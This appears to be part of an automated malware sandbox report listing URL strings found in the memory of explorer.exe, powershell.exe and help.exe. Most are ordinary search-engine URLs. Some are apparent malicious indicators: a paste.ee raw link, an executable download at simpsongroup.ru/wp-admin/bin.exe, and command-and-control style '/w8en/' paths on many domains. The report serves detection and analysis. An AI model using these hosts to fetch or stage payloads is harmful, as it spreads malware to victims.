              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
              Source: powershell.exe, 00000002.00000002.379786049.0000000006221000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
              Source: powershell.exe, 00000002.00000002.376462177.0000000005416000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000003.369389126.00000000088B5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://paste.ee
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://paste.ee/r/r87uc
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngD
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
              Source: help.exe, 00000015.00000002.489524350.0000000003752000.00000004.00000001.sdmpString found in binary or memory: http://sasayamagazine.com/w8en/?q6A=Ffktffp0pJmTzz&Dz=ZqNv2n1/zw0BLyxUw
              Source: powershell.exe, 00000002.00000002.375876493.00000000051C1000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.359972708.0000000004CF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
              Source: powershell.exe, 00000008.00000002.361208210.0000000005094000.00000004.00000001.sdmpString found in binary or memory: http://simpsongroup.ru
              Source: powershell.exe, 00000008.00000002.359972708.0000000004CF1000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.360232655.0000000004E44000.00000004.00000001.sdmpString found in binary or memory: http://simpsongroup.ru/wp-admin/bin.exe
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
              Source: explorer.exe, 00000013.00000000.388045564.000000000E6C0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
              Source: 3DA2886F-AB32-43C3-AC4B-5929B213736B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
              Source: explorer.exe, 00000013.00000000.388045564.000000000E6C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.abhisclub.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.abhisclub.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.abhisclub.com/w8en/www.xhzs021.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.abhisclub.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.anastasiamatkovskia.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.anastasiamatkovskia.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.anastasiamatkovskia.com/w8en/www.sasayamagazine.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.anastasiamatkovskia.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.376291085.0000000005300000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlD
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cardiline.store
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cardiline.store/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cardiline.store/w8en/www.cyberbeau.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cardiline.storeReferer:
              Source: explorer.exe, 00000013.00000000.385406119.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cjmaeilnews.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cjmaeilnews.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cjmaeilnews.com/w8en/www.ppc-listing.info
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cjmaeilnews.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.crossandcrook.net
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.crossandcrook.net/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.crossandcrook.net/w8en/www.gourgio.club
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.crossandcrook.netReferer:
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cyberbeau.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cyberbeau.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cyberbeau.com/w8en/www.lilyrosecottage.net
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cyberbeau.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drdantherapy.com
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drdantherapy.com/w8en/
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drdantherapy.com/w8en/www.crossandcrook.net
              Source: explorer.exe, 00000013.00000002.501864739.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drdantherapy.comReferer:
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
              Source: explorer.exe, 00000013.00000000.388746698.000000000E7B3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
